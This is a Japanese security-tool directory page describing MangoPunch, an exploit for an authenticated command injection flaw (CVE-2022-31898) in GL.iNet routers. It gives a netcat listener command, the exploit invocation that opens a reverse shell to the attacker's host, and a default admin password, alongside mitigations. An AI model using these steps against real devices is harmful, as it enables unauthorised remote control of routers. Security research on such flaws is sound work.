Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
MangoPunch-CVE-2022-31898 — 認証済みコマンドインジェクションツール (CVE-2022-31898) - HACKCONRD 2026. | Kitploit
ツール/GitHubGitHub/cryptoghost1/mangopunch-cve-2022-31898
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubcryptoghost1/mangopunch-cve-2022-31898

MangoPunch-CVE-2022-31898

認証済みコマンドインジェクションツール (CVE-2022-31898) - HACKCONRD 2026.

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
5ヶ月前未レビュー

🥭 MangoPunch: CVE-2022-31898

認証済みOSコマンドインジェクション for GL.iNet デバイス

Python CVE Security

root@kitploit:~
 __  __                         _____                 _     
|  \/  |                       |  __ \               | |    
| \  / | __ _ _ __   __ _  ___ | |__) |   _ _ __   ___| |__  
| |\/| |/ _` | '_ \ / _` |/ _ \|  ___/ | | | '_ \ / __| '_ \ 
| |  | | (_| | | | | (_| | (_) | |   | |_| | | | | (__| | | |
|_|  |_|\__,_|_| |_|\__, |\___/|_|    \__,_|_| |_|\___|_| |_|
                     __/ |                                   
                    |___/                                    

🔍 脆弱性の概要

このリポジトリには、GL.iNet MT300N-V2 (Mango) およびファームウェアバージョン 3.215 未満の他のモデルで発見された Remote Command Execution (RCE) 脆弱性の技術的なProof of Concept (PoC) が含まれています。

この欠陥は、診断APIの ping_addr パラメータに存在し、認証された攻撃者がシェルメタ文字 (;) を介して任意のシステムコマンドを実行することを可能にします。


🚀 実行ガイド

1. リスナーの準備

攻撃マシン (Kali Linux) でターミナルを開き、Netcat リスナーを起動します:

root@kitploit:~
nc -lvnp 9292

2. エクスプロイトの実行

以下のコマンドを使用してリバースシェルを起動します:

root@kitploit:~
python3 mangopunch.py -R <TARGET_IP> -L <YOUR_IP> -l <YOUR_LISTERNER_PORT> -p <PASSWORD>

🛠️ スクリプトパラメータ


🛡️ 対策

  • ファームウェアの更新: デバイスがバージョン 3.215 以降を実行していることを確認してください。
  • 入力検証: 開発者はIP/ホスト名パラメータに対して厳格な正規表現検証を実装し、生の文字列をOSに渡すシェル呼び出し関数を避けるべきです。

免責事項: このツールは教育および許可されたセキュリティテスト目的のみに使用されます。作者は誤用について一切の責任を負いません。 MangoPunch: CVE-2022-31898

ツールをダウンロード
FlagFull Name説明デフォルト
-R--rhostリモートターゲットIP (ルーター)必須
-P--rportWeb管理ポート443
-L--lhostリスナーIP (Kali/攻撃マシン)必須
-l--lportリスナーポート必須
-p--pwd管理者パスワードgoodlife
-t--httpsHTTPSを有効にするFalse